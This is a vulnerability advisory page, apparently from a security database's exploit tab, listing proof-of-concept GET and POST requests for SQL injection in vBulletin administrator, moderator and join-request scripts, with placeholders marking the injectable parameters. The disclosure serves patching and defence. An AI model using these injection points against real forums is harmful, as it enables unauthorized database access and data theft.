• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

VBulletin Multiple Moderator And Administrator SQL Injection Vulnerabilities

No exploit is required.

The following GET and POST proof of concepts are available:
The following issue is exploitable by any attacker:
> /joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>

These issues affect the following administrator scripts:
> /admincp/admincalendar.php:
GET: <do=addcustom&calendarcustomfieldid=[SQL-Injection]>
GET: <do=addmod&calendarid=[SQL-Injection]>
GET: <do=addmod&calendarid=1&moderatorid=[SQL-Injection]>
GET: <do=deletecustom&calendarcustomfieldid=[SQL-Injection]>
POST: <do=doremoveholiday&holidayid=[SQL-Injection]>
GET: <do=edit&calendarid=[SQL-Injection]>
POST: <do=kill&calendarid=[SQL-Injection]>
POST: <do=killmod&$calendarmoderatorid=[SQL-Injection]>
GET: <do=remove&calendarid=[SQL-Injection]>
POST: <do=removemod&moderatorid=[SQL-Injection]>
POST: <do=saveholiday&holidayinfo[title]=sepro&holidayid=0XF>
POST: <do=update&calendar[daterange]=2002-2008&calendarid=0XF>
GET: <do=updateholiday&holidayid=0XF>
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&calendarid=1&moderatorid=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=[SQL-Injection]>

> /admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>

> /admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>

> /admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>

> /admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>

> /admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>
GET: <do=pmuserstats&ids=0XF>

> /admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>

> /admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>

> /admincp/template.php:
GET: <do=editstyle&dostyleid=[SQL-Injection]>
GET: <do=editstyle&dostyleid=[SQL-Injection]>
POST: <do=revertall&dostyleid=[SQL-Injection]>

> /admincp/thread.php::
POST: <do=dothreads&thread[forumid]=0XF>

> /admincp/usertools.php:
POST: <do=updateprofilepic>

> /admincp/vbugs_admin.php:
GET: <do=editseverity&vbug_severityid=[SQL-Injection]>
GET: <do=removeseverity&vbug_severityid=[SQL-Injection]>
GET: <do=updateseverity&vbug_severityid=[SQL-Injection]>

These issues affect the following moderator scripts:
> /modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>

> /modcp/thread.php:
POST: <do=dothreads&thread[forumid]=0XF>
POST: <do=dothreadssel&criteria=a:1:{s:7:"forumid";s:5:"aaaa'";}>

> /modcp/user.php:
GET: <do=avatar&userid=0XF>